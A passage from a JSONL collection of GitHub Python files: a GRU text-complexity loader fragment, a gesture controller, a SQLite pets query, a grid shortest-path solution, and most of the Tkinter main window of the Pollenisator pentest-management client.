word_tokenize(text)\n word_ids = []\n for word in words:\n if word in self.emb:\n word_ids.append(torch.tensor(list(self.emb[word])))\n else:\n word_ids.append(torch.tensor(list(self.emb[\"UNK\"])))\n words = torch.stack(word_ids)\n target = torch.tensor(self.data.iloc[idx]['cefr_numeric'])\n return words, target, text\n\n# https://discuss.pytorch.org/t/how-to-create-a-dataloader-with-variable-size-input/8278/3\n\n\ndef load_vectors(fname):\n fin = io.open(fname, 'r', encoding='utf-8', newline='\\n', errors='ignore')\n n, d = map(int, fin.readline().split())\n data = {}\n for line in fin:\n tokens = line.rstrip().split(' ')\n data[tokens[0]] = [float(x) for x in tokens[1:]]\n return data\n","repo_name":"Abby3017/text_complexity","sub_path":"model/trainable/gru.py","file_name":"gru.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35433055229","text":"from HandDetection import HandDetection\n\n\nclass Controller:\n def __init__(self, detector:HandDetection):\n self.Mouse = None\n self.Keyboard = None\n self.Gaming = None\n self.detector = detector\n\n \n def detectGesture(self, frame, hands):\n\n if len(hands) == 2:\n handL, handR = None, None\n handL = hands[0] if hands[0].get(\"type\") == \"Left\" else hands[1]\n handR = hands[0] if hands[0].get(\"type\") == \"Right\" else hands[1]\n\n fingersL, handInfoL = self.detector.fingersUpAndHandSide(handL)\n fingersR, handInfoR = self.detector.fingersUpAndHandSide(handR)\n\n if handInfoL[0][:-1] == \"Front\" == handInfoR[0][:-1] and handInfoL[1][:-1] == \"Up\" == handInfoR[1][:-1]:\n\n if 1 not in fingersL[2:4] and 1 not in fingersR[2:4] and fingersL[1] == fingersL[4] == 1 == fingersR[1] == fingersR[4]:\n dist, _, frame = self.detector.findDistance(handL.get(\"center\"), handR.get(\"center\"), frame)\n\n if dist < 220:\n self.setForMouse()\n\n elif 220 < dist < 330:\n self.setForKeyboard()\n\n elif dist > 330:\n self.setForGaming()\n\n return frame\n\n \n def getStatus(self):\n if self.Mouse:\n return \"Mouse\"\n elif self.Keyboard:\n return \"Keyboard\"\n elif self.Gaming:\n return \"Gaming\"\n\n\n def setForMouse(self):\n self.Mouse = True\n self.Keyboard = False\n self.Gaming = False\n print(\"Active: Mouse\")\n\n \n def setForKeyboard(self):\n self.Keyboard = True\n self.Mouse = False\n self.Gaming = False\n print(\"Active: Keyboard\")\n\n \n def setForGaming(self):\n self.Gaming = True\n self.Mouse = False\n self.Keyboard = False\n print(\"Active: Gaming\")\n","repo_name":"theutpal01/The-God-Hands","sub_path":"Gestures/Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9289106633","text":"\nimport sqlite3\n\ndef query_data(db_path):\n conn = sqlite3.connect(db_path)\n cursor = conn.cursor()\n\n while True:\n person_id = input(\"Please enter a person's ID number or '-1' to exit: \")\n if person_id == '-1':\n break\n\n try:\n person_id = int(person_id)\n except ValueError:\n print(\"ID must be a number.\")\n continue\n cursor.execute(\"SELECT * FROM person WHERE id = ?\", (person_id,))\n person_data = cursor.fetchone()\n\n if person_data:\n first_name, last_name, age = person_data[1:4]\n print(f\"{first_name} {last_name}, {age} years old\")\n\n cursor.execute('''\n SELECT pet.name, pet.breed, pet.age, pet.dead\n FROM pet\n INNER JOIN person_pet ON pet.id = person_pet.pet_id\n WHERE person_pet.person_id = ?\n ''', (person_id,))\n pets_data = cursor.fetchall()\n\n for pet in pets_data:\n name, breed, age, dead = pet\n status = \"dead\" if dead else \"alive\"\n print(f\"{first_name} {last_name} owned {name}, a {breed}, that was {age} years old ({status})\")\n else:\n print(\"Person not found.\")\n\n conn.close()\n\nif __name__ == \"__main__\":\n db_path = \"pets.db\"\n query_data(db_path)\n","repo_name":"elepore/IS211_Elizabeth_Lepore","sub_path":"IS211_Assignment10/query_pets.py","file_name":"query_pets.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31651617318","text":"# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# 検討?分 実装分 バグとり分\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nh,w = map(int,input().split())\na = [list(map(int,input().split())) for _ in range(h)]\n\ninf = 10**10\ncost1 = [[inf] * w for _ in range(h)]\ncost2 = [[inf] * w for _ in range(h)]\ncost3 = [[inf] * w for _ in range(h)]\n\ncost1[-1][0] = 0\ncost2[-1][-1] = 0\ncost3[0][-1] = 0\n\nfor ct in [cost1,cost2,cost3]:\n remain = set()\n for i in range(h):\n for j in range(w):\n remain.add((i,j))\n for _ in range(h*w):\n cand = (inf,(-1,-1))\n for (i,j) in remain:\n if(cand[0] > ct[i][j]):\n cand = (ct[i][j],(i,j))\n i,j = cand[1]\n remain.remove((i,j))\n for x,y in zip([0,0,1,-1],[1,-1,0,0]):\n x += j\n y += i\n if(0<=x<w)&(0<=y<h):\n ct[y][x] = min(ct[y][x], ct[i][j] + a[y][x])\n\nans = inf\nfor i in range(h):\n for j in range(w):\n tmp = 0\n for ct in [cost1,cost2,cost3]:\n tmp += ct[i][j]\n tmp -= a[i][j]*2\n ans = min(ans,tmp)\n\nprint(ans)\n","repo_name":"komajun365/competitive_programming","sub_path":"past/past01/j.py","file_name":"j.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8282296075","text":"\"\"\"\nPollenisator client GUI window.\n\"\"\"\nimport traceback\nimport tkinter.filedialog\nimport tkinter as tk\nimport tkinter.messagebox\nimport tkinter.simpledialog\nimport tkinter.ttk as ttk\nimport uuid\nfrom customtkinter import *\nimport sys\nimport os\nfrom tkinter import TclError\nimport datetime\nimport json\nimport re\nfrom PIL import ImageTk, Image\nimport importlib\nimport pkgutil\nimport socketio\nfrom pollenisatorgui.core.application.dialogs.ChildDialogToolsInstalled import ChildDialogToolsInstalled\nfrom pollenisatorgui.core.application.scrollableframexplateform import ScrollableFrameXPlateform\nfrom pollenisatorgui.core.application.terminalswidget import TerminalsWidget\nfrom pollenisatorgui.core.components.datamanager import DataManager\nimport pollenisatorgui.core.components.utils as utils\nfrom pollenisatorgui.core.application.treeviews.PentestTreeview import PentestTreeview\nfrom pollenisatorgui.core.application.treeviews.CommandsTreeview import CommandsTreeview\nfrom pollenisatorgui.core.application.dialogs.ChildDialogCombo import ChildDialogCombo\nfrom pollenisatorgui.core.application.dialogs.ChildDialogQuestion import ChildDialogQuestion\nfrom pollenisatorgui.core.application.dialogs.ChildDialogConnect import ChildDialogConnect\nfrom pollenisatorgui.core.application.dialogs.ChildDialogPentests import ChildDialogPentests\nfrom pollenisatorgui.core.application.dialogs.ChildDialogException import ChildDialogException\nfrom pollenisatorgui.core.application.dialogs.ChildDialogFileParser import ChildDialogFileParser\nfrom pollenisatorgui.core.application.dialogs.ChildDialogEditPassword import ChildDialogEditPassword\nfrom pollenisatorgui.core.application.statusbar import StatusBar\nfrom pollenisatorgui.core.components.apiclient import APIClient, ErrorHTTP\nfrom pollenisatorgui.core.components.scanmanager import ScanManager\nfrom pollenisatorgui.core.components.admin import AdminView\nfrom pollenisatorgui.core.components.scriptmanager import ScriptManager\nfrom pollenisatorgui.core.components.settings import Settings\nfrom pollenisatorgui.core.components.filter import Filter\nfrom pollenisatorgui.core.controllers.toolcontroller import ToolController\nfrom pollenisatorgui.core.forms.formpanel import FormPanel\nfrom pollenisatorgui.core.models.port import Port\nfrom pollenisatorgui.core.views.checkinstanceview import CheckInstanceView\nfrom pollenisatorgui.core.views.checkitemview import CheckItemView\nfrom pollenisatorgui.core.views.ipview import IpView\nimport pollenisatorgui.modules\nimport customtkinter\nimport tkinterDnD\nfrom ttkwidgets import tooltips\nfrom pollenisatorgui.core.application.pollenisatorentry import PopoEntry\nfrom pollenisatorgui.core.components.logger_config import logger\nfrom pollenisatorgui.modules.module import Module\n\nclass FloatingHelpWindow(CTkToplevel):\n \"\"\"floating basic window with helping text inside\n Inherit tkinter TopLevel\n Found on the internet (stackoverflow) but did not keep link sorry...\n \"\"\"\n\n def __init__(self, w, h, posx, posy, *args, **kwargs):\n CTkToplevel.__init__(self, *args, **kwargs)\n self.title('Help: search')\n self.x = posx\n self.y = posy\n self.geometry(str(w)+\"x\"+str(h)+\"+\"+str(posx)+\"+\"+str(posy))\n self.resizable(0, 0)\n self.configure(bg='light yellow')\n self.grip = tk.Label(self, bitmap=\"gray25\")\n self.grip.pack(side=\"left\", fill=\"y\")\n label = tk.Label(self, bg='light yellow', fg='black',\n justify=tk.LEFT, text=Filter.help())\n label.pack()\n self.overrideredirect(True)\n self.grip.bind(\"<ButtonPress-1>\", self.startMove)\n self.grip.bind(\"<ButtonRelease-1>\", self.stopMove)\n self.grip.bind(\"<B1-Motion>\", self.onMotion)\n\n def startMove(self, event):\n \"\"\" Floating window dragging started\n Args:\n event: event.x and event.y hold the new position of the window\n \"\"\"\n self.x = event.x\n self.y = event.y\n\n def stopMove(self, _event=None):\n \"\"\" Floating window dragging stopped\n Args:\n _event: Not used but mandatory\n \"\"\"\n self.x = None\n self.y = None\n\n def onMotion(self, event):\n \"\"\" Floating window dragging ongoing\n Args:\n event: event.x and event.y hold the new position of the window\n \"\"\"\n deltax = event.x - self.x\n deltay = event.y - self.y\n x = self.winfo_x() + deltax\n y = self.winfo_y() + deltay\n self.geometry(\"+%s+%s\" % (x, y))\n\n\nclass AutocompleteEntry(PopoEntry):\n \"\"\"Inherit PopoEntry.\n An entry with an autocompletion ability.\n Found on the internet : http://code.activestate.com/recipes/578253-an-entry-with-autocompletion-for-the-tkinter-gui/\n But a bit modified.\n \"\"\"\n\n def __init__(self, settings, *args, **kwargs):\n \"\"\"Constructor\n Args:\n settings: a dict of Settings:\n * histo_filters: number of history search to display\n args: not used\n kwargs: \n * width: default to 100\n \"\"\"\n PopoEntry.__init__(self, *args, **kwargs)\n self.width = kwargs.get(\"width\",100)\n self.lista = set()\n self.var = self.cget(\"textvariable\")\n if self.var is None:\n self.var = tk.StringVar()\n self.configure(textvariable=self.var)\n self.var.trace('w', self.changed)\n \n self.bind(\"<Right>\", self.selection)\n self.bind(\"<Up>\", self.upArrow)\n self.bind(\"<Down>\", self.downArrow)\n self.settings = settings\n self.server_time = None\n self.lb = None\n self.lb_up = False\n \n\n def changed(self, _name=None, _index=None, _mode=None):\n \"\"\"\n Called when the entry is modified. Perform autocompletion.\n Args:\n _name: not used but mandatory for tk.StringVar.trace\n _index: not used but mandatory for tk.StringVar.trace\n _mode: not used but mandatory for tk.StringVar.trace\n \"\"\"\n words = self.comparison()\n if words:\n if not self.lb_up:\n self.lb = tk.Listbox(width=self.width, fg=utils.getTextColor(), bg=utils.getBackgroundColor())\n self.lb.bind(\"<Double-Button-1>\", self.selection)\n self.lb.bind(\"<Right>\", self.selection)\n self.lb.bind(\"<Leave>\", self.quit)\n self.bind(\"<Escape>\", self.quit)\n self.lb.place(x=self.winfo_x()+133,\n y=self.winfo_y()+self.winfo_height()+20)\n self.lb_up = True\n self.lb.delete(0, tk.END)\n for w in words:\n self.lb.insert(tk.END, w)\n else:\n self.quit()\n\n def quit(self, _event=None):\n \"\"\"\n Callback function to destroy the label shown\n Args:\n _event: not used but mandatory\n \"\"\"\n if self.lb_up:\n self.lb.destroy()\n self.lb_up = False\n \n def reset(self):\n \"\"\"\n quit and reset filter bar\n \"\"\"\n self.quit()\n self.var.set(\"\")\n\n def selection(self, _event=None):\n \"\"\"\n Called when an autocompletion option is chosen. \n Change entry content and close autocomplete.\n Args:\n _event: not used but mandatory\n \"\"\"\n if self.lb_up:\n self.var.set(self.lb.get(tk.ACTIVE))\n self.lb.destroy()\n self.lb_up = False\n self.icursor(tk.END)\n #self.changed()\n\n def upArrow(self, _event=None):\n \"\"\"\n Called when the up arrow is pressed. Navigate in autocompletion options\n Args:\n _event: not used but mandatory\n \"\"\"\n if self.lb_up:\n if self.lb.curselection() == ():\n index = '0'\n else:\n index = self.lb.curselection()[0]\n if index != '0':\n self.lb.selection_clear(first=index)\n index = str(int(index)-1)\n self.lb.selection_set(first=index)\n self.lb.activate(index)\n\n def downArrow(self, _event=None):\n \"\"\"\n Called when the down arrow is pressed. Navigate in autocompletion options\n Args:\n _event: not used but mandatory\n \"\"\"\n if self.lb_up:\n if self.lb.curselection() == ():\n index = '0'\n else:\n index = self.lb.curselection()[0]\n if index != tk.END:\n self.lb.selection_clear(first=index)\n index = str(int(index)+1)\n self.lb.selection_set(first=index)\n self.lb.activate(index)\n\n def comparison(self):\n \"\"\"\n Search suggestions in regard of what is in the entry\n \"\"\"\n values = set(self.settings.local_settings.get(\"histo_filters\", []))\n self.lista = values\n content = self.var.get().strip()\n if content == \"\":\n return []\n pattern = re.compile('.*' + re.escape(content) + '.*')\n return [w for w in self.lista if re.match(pattern, w)]\n\ndef iter_namespace(ns_pkg):\n # Specifying the second argument (prefix) to iter_modules makes the\n # returned name an absolute name instead of a relative one. This allows\n # import_module to work without having to do additional modification to\n # the name.\n return pkgutil.iter_modules(ns_pkg.__path__, ns_pkg.__name__ + \".\")\n\nclass ButtonNotebook(CTkFrame):\n def __init__(self, parent, callbackSwitch, closeCallbackSwitch):\n super().__init__(parent)\n style = ttk.Style()\n self.frameButtons = CTkFrame(self, fg_color=('#113759'))\n self.callbackSwitch = callbackSwitch\n self.closeCallbackSwitch = closeCallbackSwitch\n self.tabs = {}\n self.current = None\n self.frameButtons.pack(side=\"left\", anchor=\"nw\", fill=tk.Y)\n self.btns = {}\n self.lbl = None\n\n def add(self, widget, name, order, image):\n if name not in self.tabs:\n self.tabs[name] = {\"widget\":widget, \"image\":image, \"order\": order, \"name\":name}\n widget.pack_forget()\n btn = CTkButton(self.frameButtons, text=name, image=image, fg_color='#113759' , hover_color=('#061b4e'), compound=tk.TOP)\n self.btns[name] = btn\n btn.bind(\"<Button-1>\", self.clicked)\n self.redraw()\n \n\n def redraw(self):\n for btn in self.btns.values():\n btn.pack_forget()\n if self.lbl:\n self.lbl.pack_forget()\n btns = sorted(self.tabs.values(), key=lambda x:x[\"order\"])\n for btn in btns:\n \n self.btns[btn[\"name\"]].pack(side=\"top\", fill=tk.X, anchor=\"nw\")\n self.image = Image.open(utils.getIcon(\"LogoPollenisator.png\"))\n img = CTkImage(light_image=self.image, dark_image=self.image, size=(100, 123))\n self.lbl = CTkLabel(self.frameButtons, text=\"\", image=img)\n self.lbl.pack(side=\"bottom\", fill=tk.X, pady=5,anchor=\"sw\")\n\n def clicked(self, event):\n widget = event.widget.master\n name = widget.cget(\"text\")\n self.select(name)\n\n def getOpenTabName(self):\n return self.current\n\n\n def delete(self, name):\n if name in self.tabs:\n del self.tabs[name]\n self.btns[name].pack_forget()\n\n def select(self, name):\n if self.current == name:\n return\n if self.current:\n self.tabs[self.current][\"widget\"].pack_forget()\n self.btns[self.current].configure(fg_color=\"#113759\")\n\n self.closeCallbackSwitch(self.current, name)\n self.current = name\n self.btns[name].configure(fg_color=\"#061b4e\")\n self.tabs[name][\"widget\"].pack(side=\"right\", expand=True, anchor=\"center\", fill=tk.BOTH)\n self.callbackSwitch(name)\n\n\nclass Appli(customtkinter.CTk, tkinterDnD.tk.DnDWrapper):#HACK to make work tkdnd with CTk\n \"\"\"\n Main tkinter graphical application object.\n \"\"\"\n version_compatible = \"2.6.*\"\n\n \n def _init_tkdnd(master: tk.Tk) -> None: #HACK to make work tkdnd with CTk\n \"\"\"Add the tkdnd package to the auto_path, and import it\"\"\"\n #HACK Copied from directory with a package_dir updated\n platform = master.tk.call(\"tk\", \"windowingsystem\")\n\n if platform == \"win32\":\n folder = \"windows\"\n elif platform == \"x11\":\n folder = \"linux\"\n elif platform == \"aqua\":\n folder = \"mac\"\n package_dir = os.path.join(os.path.dirname(os.path.abspath(tkinterDnD.tk.__file__)), folder)\n master.tk.call('lappend', 'auto_path', package_dir)\n TkDnDVersion = master.tk.call('package', 'require', 'tkdnd')\n return TkDnDVersion\n\n def __init__(self):\n \"\"\"\n Initialise the application\n\n \"\"\"\n # Lexic:\n # view frame : the frame in the tab that will hold forms.\n # Tree view : the tree on the left of the window.\n # frame tree view : a frame around the tree view (useful to attach a scrollbar to a treeview)\n # paned : a Paned widget is used to separate two other widgets and display a one over the other if desired\n # Used to separate the treeview frame and view frame.\n super().__init__()\n self.TkDnDVersion = self._init_tkdnd() #HACK to make work tkdnd with CTk\n self.quitting = False\n self.settingViewFrame = None\n self.scanManager = None #  Loaded when clicking on it if linux only\n self.scanViewFrame = None\n self.admin = None\n self.nbk = None\n self.notif_handlers = []\n self.sio = None #socketio client\n self.initialized = False\n self.settings = Settings()\n\n utils.setStyle(self, self.settings.local_settings.get(\"dark_mode\", False))\n self.main_tab_img = CTkImage(\n Image.open(utils.getIconDir()+\"tab_main.png\"), size=(30, 30))\n self.commands_tab_img = CTkImage(\n Image.open(utils.getIconDir()+\"tab_commands.png\"), size=(30, 30))\n self.scan_tab_img = CTkImage(\n Image.open(utils.getIconDir()+\"tab_scan.png\"), size=(30, 30))\n self.settings_tab_img = CTkImage(\n Image.open(utils.getIconDir()+\"tab_settings.png\"), size=(30, 30))\n self.admin_tab_img = CTkImage(\n Image.open(utils.getIconDir()+\"tab_admin.png\"), size=(30, 30))\n # HISTORY : Main view and command where historically in the same view;\n # This results in lots of widget here with a confusing naming style\n #### core components (Tab menu on the left objects)####\n #### MAIN VIEW ####\n self.mainPageFrame = None\n self.paned = None\n self.proxyFrameMain = None\n self.viewframe = None\n self.frameTw = None\n self.treevw = None\n self.datamanager = None\n self.terminals = None\n self.myscrollbarMain = None\n #### COMMAND VIEW ####\n self.commandsPageFrame = None\n self.commandPaned = None\n self.commandsFrameTw = None\n self.commandsViewFrame = None\n self.myscrollbarCommand = None\n self.commandsTreevw = None\n #### SEARCH BAR ####\n # boolean set to true when the main tree view is displaying search results\n self.searchMode = False\n self.searchBar = None # the search bar component\n self.btnHelp = None # help button on the right of the search bar\n self.photo = None # the ? image\n self.helpFrame = None # the floating help frame poping when the button is pressed\n dir_path = utils.getIconDir() +\"favicon.png\"\n img = tk.PhotoImage(file=dir_path)\n self.resizable(True, True)\n self.iconphoto(True, img)\n self.minsize(width=400, height=400)\n self.resizable(True, True)\n self.title(\"Pollenisator\")\n \n self.geometry(f\"{self.winfo_screenwidth()}x{self.winfo_screenheight()}\")\n self.protocol(\"WM_DELETE_WINDOW\", self.onClosing)\n self.datamanager = DataManager.getInstance()\n self.initModules()\n apiclient = APIClient.getInstance()\n self.topviewframe = None\n self.scanManager = ScanManager(self, self.nbk, self.treevw, apiclient.getCurrentPentest(), self.settings)\n apiclient.appli = self\n opened, errored = self.openConnectionDialog()\n if errored:\n return\n if not opened:\n try:\n self.wait_visibility()\n except tk.TclError: #closed dialog\n return\n opened, errored = self.openConnectionDialog(force=True)\n if errored:\n return\n self.openPentestsWindow()\n self.loadModulesInfos() \n self.scanManager.nbk = self.nbk #FIXME ORDER, INITIALISATION of SCAN MANAGERis too early\n self.scanManager.linkTw = self.treevw\n\n\n def start_autoscan(self):\n return self.scanManager.startAutoscan()\n\n def stop_autoscan(self):\n return self.scanManager.stop()\n\n # OVERRIDE tk.Tk.report_callback_exception\n def report_callback_exception(self, exc, val, tb):\n self.show_error(exc, val, tb)\n \n def quit(self):\n super().quit()\n self.quitting = True\n return\n\n def forceUpdate(self, api_version, my_version):\n tkinter.messagebox.showwarning(\"Update necessary\", f\"Clash of version. Expecting API {api_version} and you are compatible with {my_version}. Please reinstall following the instructions in README. (git pull; pip install .)\")\n\n def openConnectionDialog(self, force=False):\n # Connect to database and choose database to open\n apiclient = APIClient.getInstance()\n abandon = False\n connectionTest = apiclient.tryConnection(force=force)\n if force:\n apiclient.disconnect()\n res = apiclient.tryAuth()\n if not res: \n apiclient.disconnect()\n while (not connectionTest or not apiclient.isConnected()) and not abandon:\n abandon = self.promptForConnection() is None\n connectionTest = apiclient.tryConnection(force=force)\n if not abandon:\n apiclient = APIClient.getInstance()\n apiclient.attach(self)\n srv_version = apiclient.getVersion()\n if int(Appli.version_compatible.split(\".\")[0]) != int(srv_version.split(\".\")[0]):\n self.forceUpdate(srv_version, Appli.version_compatible)\n self.onClosing()\n return False, True\n if int(Appli.version_compatible.split(\".\")[1]) != int(srv_version.split(\".\")[1]):\n self.forceUpdate(srv_version, Appli.version_compatible)\n self.onClosing()\n return False, True\n if self.sio is not None:\n self.sio.disconnect()\n self.sio = socketio.Client()\n @self.sio.event\n def notif(data):\n self.handleNotif(json.loads(data, cls=utils.JSONDecoder))\n \n @self.sio.event\n def test(data):\n tk.messagebox.showinfo(\"test\", \"test socket working received data : \"+str(data))\n \n self.sio.connect(apiclient.api_url)\n pentests = apiclient.getPentestList()\n if pentests is None:\n pentests = []\n else:\n pentests_names = [x[\"nom\"] for x in pentests][::-1]\n if apiclient.getCurrentPentest() != \"\" and apiclient.getCurrentPentest() in pentests_names:\n self.openPentest(apiclient.getCurrentPentest())\n else:\n self.openPentestsWindow(pentests=pentests)\n self.initialized = True\n else:\n self.onClosing()\n try:\n self.destroy()\n except tk.TclError:\n pass\n return apiclient.isConnected(), False\n \n def initModules(self):\n discovered_plugins = {\n name: importlib.import_module(name)\n for finder, name, ispkg\n in iter_namespace(pollenisatorgui.modules) if not name.endswith(\".Module\")\n }\n self.modules = []\n from pollenisatorgui.modules.module import REGISTRY\n for name, module_class in REGISTRY.items():\n if name != \"Module\":\n module_obj = module_class(self, self.settings)\n self.modules.append({\"name\": module_obj.tabName, \"object\":module_obj, \"view\":None, \"img\":CTkImage(Image.open(utils.getIconDir()+module_obj.iconName), size=(30, 30))})\n \n def loadModulesInfos(self):\n for module in self.modules:\n if callable(getattr(module[\"object\"], \"loadModuleInfo\", False)):\n module[\"object\"].loadModuleInfo()\n\n def show_error(self, *args):\n \"\"\"Callback for tk.Tk.report_callback_exception.\n Open a window to display exception with some actions possible\n\n Args:\n args: 3 args are required for tk.Tk.report_callback_exception event to be given to traceback.format_exception(args[0], args[1], args[2])\n \n Raises:\n If an exception occurs in this handler thread, will print it and exit with exit code 1\n \"\"\"\n try:\n err = traceback.format_exception(args[0], args[1], args[2])\n err = \"\\n\".join(err)\n \n if args[0] is ErrorHTTP: # args[0] is class of ecx\n if args[1].response.status_code == 401:\n tk.messagebox.showerror(\"Disconnected\", \"You are not connected.\")\n self.openConnectionDialog(force=True)\n return\n dialog = ChildDialogException(self, 'Exception occured', err)\n apiclient = APIClient.getInstance()\n apiclient.reportError(err)\n try:\n self.wait_window(dialog.app)\n except tk.TclError:\n sys.exit(1)\n except Exception as e:\n print(\"Exception in error handler \"+str(e))\n sys.exit(1)\n \n \n def promptForConnection(self):\n \"\"\"Close current database connection and open connection form for the user\n \n Returns: \n The number of pollenisator database found, 0 if the connection failed.\"\"\"\n apiclient = APIClient.getInstance()\n apiclient.reinitConnection()\n connectDialog = ChildDialogConnect(self)\n self.wait_window(connectDialog.app)\n return connectDialog.rvalue\n\n def changeMyPassword(self):\n \"\"\"Allows the current user to change its password\"\"\"\n apiclient = APIClient.getInstance()\n connected_user = apiclient.getUser()\n if connected_user is None:\n tk.messagebox.showerror(\"Change password\", \"You are not connected\")\n return \n dialog = ChildDialogEditPassword(self, connected_user)\n self.wait_window(dialog.app)\n \n def disconnect(self):\n \"\"\"Remove the session cookie\"\"\"\n APIClient.getInstance().disconnect()\n \n self.openConnectionDialog(force=True)\n\n def submitIssue(self):\n \"\"\"Open git issues in browser\"\"\"\n import webbrowser\n webbrowser.open_new_tab(\"https://github.com/AlgoSecure/Pollenisator/issues\")\n\n def notify(self, notification):\n for notif_handler in self.notif_handlers:\n if notif_handler[\"pentest\"] is not None and notif_handler[\"pentest\"] != notification[\"db\"]:\n continue\n if notif_handler[\"collection\"] is not None and notif_handler[\"collection\"] != notification[\"collection\"]:\n continue\n if notif_handler[\"iid\"] is not None and notif_handler[\"iid\"] != str(notification[\"iid\"]):\n continue\n if notif_handler[\"notif_name\"] is not None and notif_handler[\"notif_name\"] != notification[\"action\"]:\n continue\n \n notif_handler[\"handler\"](notification)\n \n def subscribe_notification(self, notif_name, handler, pentest=None, collection=None, iid=None):\n if handler is None:\n return\n self.notif_handlers.append({\"pentest\":pentest, \"collection\":collection, \"iid\":iid, \"notif_name\":notif_name, \"handler\":handler})\n \n def unsubscribe_notification(self, notif_name, pentest=None, collection=None, iid=None):\n i = 0\n while self.notif_handlers and i < len(self.notif_handlers):\n notif_handler = self.notif_handlers[i]\n if notif_handler[\"pentest\"] == pentest and notif_handler[\"notif_name\"] == notif_name \\\n and notif_handler[\"collection\"] == collection and str(notif_handler[\"iid\"]) == str(iid): \n del self.notif_handlers[i]\n else:\n i+=1\n\n def handleNotif(self, notification):\n self.notify(notification)\n self.datamanager.handleNotification(notification)\n \n def onClosing(self):\n \"\"\"\n Close the application properly.\n \"\"\"\n if self.quitting:\n return\n self.quitting = True\n self.closePentest()\n print(\"Stopping application...\")\n if self.sio is not None:\n self.sio.disconnect()\n self.sio.eio.disconnect()\n self.quit()\n\n def reopen(self, event=None):\n self.treevw.reopen()\n\n def _initMenuBar(self):\n \"\"\"\n Create the bar menu on top of the screen.\n \"\"\"\n menubar = utils.craftMenuWithStyle(self)\n self.configure(menu=menubar)\n\n self.bind('<F5>', self.refreshView)\n self.bind('<F6>', self.reopen)\n self.bind('<Control-o>', self.openPentestsWindow)\n fileMenu = utils.craftMenuWithStyle(menubar)\n fileMenu.add_command(label=\"Pentests management (Ctrl+o)\",\n command=self.openPentestsWindow)\n fileMenu.add_command(label=\"Connect to server\", command=self.promptForConnection)\n fileMenu.add_command(label=\"Export commands\",\n command=self.exportCommands)\n fileMenu.add_command(label=\"Import commands\",\n command=self.importCommands)\n fileMenu.add_command(label=\"Export cheatsheet\",\n command=self.exportCheatsheet)\n fileMenu.add_command(label=\"Import cheatsheet\",\n command=self.importCheatsheet)\n fileMenu.add_command(label=\"Import defect templates\",\n command=self.importDefectTemplates) \n\n fileMenu.add_command(label=\"Exit\", command=self.onClosing)\n fileMenu2 = utils.craftMenuWithStyle(menubar)\n fileMenu2.add_command(label=\"Import existing tools results ...\",\n command=self.importExistingTools)\n fileMenu2.add_command(label=\"Reset unfinished tools\",\n command=self.resetUnfinishedTools)\n fileMenu2.add_command(label=\"Test local tools\",\n command=self.wrapperTestLocalTools)\n fileMenu2.add_command(label=\"Refresh (F5)\",\n command=self.refreshView)\n fileMenuUser = utils.craftMenuWithStyle(menubar)\n fileMenuUser.add_command(label=\"Change your password\",\n command=self.changeMyPassword)\n fileMenuUser.add_command(label=\"Disconnect\", command=self.disconnect)\n fileMenu3 = utils.craftMenuWithStyle(menubar)\n fileMenu3.add_command(label=\"Submit a bug or feature\",\n command=self.submitIssue)\n fileMenuDebug = utils.craftMenuWithStyle(menubar)\n fileMenuDebug.add_command(label=\"Socket test\", command=self.socketTest)\n menubar.add_cascade(label=\"Database\", menu=fileMenu)\n menubar.add_cascade(label=\"Scans\", menu=fileMenu2)\n menubar.add_command(label=\"Scripts...\", command=self.openScriptModule)\n menubar.add_cascade(label=\"User\", menu=fileMenuUser)\n menubar.add_cascade(label=\"Help\", menu=fileMenu3)\n menubar.add_cascade(label=\"Debug\", menu=fileMenuDebug)\n \n def socketTest(self):\n print(\"EMIT TEST\")\n self.sio.emit(\"test\", {\"pentest\": APIClient.getInstance().getCurrentPentest()})\n print(\"TEST SENT, WAITING FOR RESPONSE\")\n\n \n\n\n def initMainView(self):\n \"\"\"\n Fill the main view tab menu\n \"\"\"\n self.mainPageFrame = CTkFrame(self.topviewframe)\n searchFrame = CTkFrame(self.mainPageFrame, fg_color=utils.getBackgroundSecondColor())\n filterbar_frame = CTkFrame(searchFrame, fg_color=\"transparent\")\n self.image_filter = CTkImage(Image.open(utils.getIcon(\"filter.png\")))\n lblSearch = CTkLabel(filterbar_frame, text=\"Filter bar\", image=self.image_filter, compound = \"left\")\n lblSearch.pack(side=\"left\", fill=tk.NONE)\n self.searchBar = AutocompleteEntry(self.settings, filterbar_frame)\n #self.searchBar = PopoEntry(filterbar_frame, width=108)\n self.searchBar.bind('<Return>', self.newSearch)\n self.searchBar.bind('<KP_Enter>', self.newSearch)\n # searchBar.bind(\"<Button-3>\", self.do_popup)\n self.searchBar.pack(side=\"left\", fill=\"x\", expand=True)\n self.quickSearchVal = tk.BooleanVar()\n self.quickSearchVal.set(self.settings.local_settings.get(\"quicksearch\", False))\n \n checkbox_quick_search = CTkSwitch(filterbar_frame, text=\"Quick search\", variable=self.quickSearchVal, command=self.quickSearchChanged)\n checkbox_quick_search.pack(side=\"left\", padx=5)\n self.keep_parents_val = tk.BooleanVar()\n self.keep_parents_val.set(self.settings.local_settings.get(\"keep_parents\", True))\n checkbox_keep_parent = CTkSwitch(filterbar_frame, text=\"Keep parents\", variable=self.keep_parents_val, command=self.keepParentsChanged)\n checkbox_keep_parent.pack(side=\"left\", padx=5)\n self.search_icon = tk.PhotoImage(file=utils.getIcon(\"search.png\"))\n btnSearchBar = ttk.Button(filterbar_frame, text=\"\", image=self.search_icon, style=\"iconbis.TButton\", tooltip=\"Filter elements based of complex query or only text if quicksearch is selected\", width=10, command=self.newSearch)\n btnSearchBar.pack(side=\"left\", fill=\"x\")\n image=Image.open(utils.getIcon(\"reset_small.png\"))\n self.reset_icon = ImageTk.PhotoImage(image)\n btnReset = ttk.Button(filterbar_frame, image=self.reset_icon, text=\"\", style=\"iconbis.TButton\", tooltip=\"Reset search bar filter\", width=10, command=self.resetButtonClicked)\n btnReset.pack(side=\"left\", 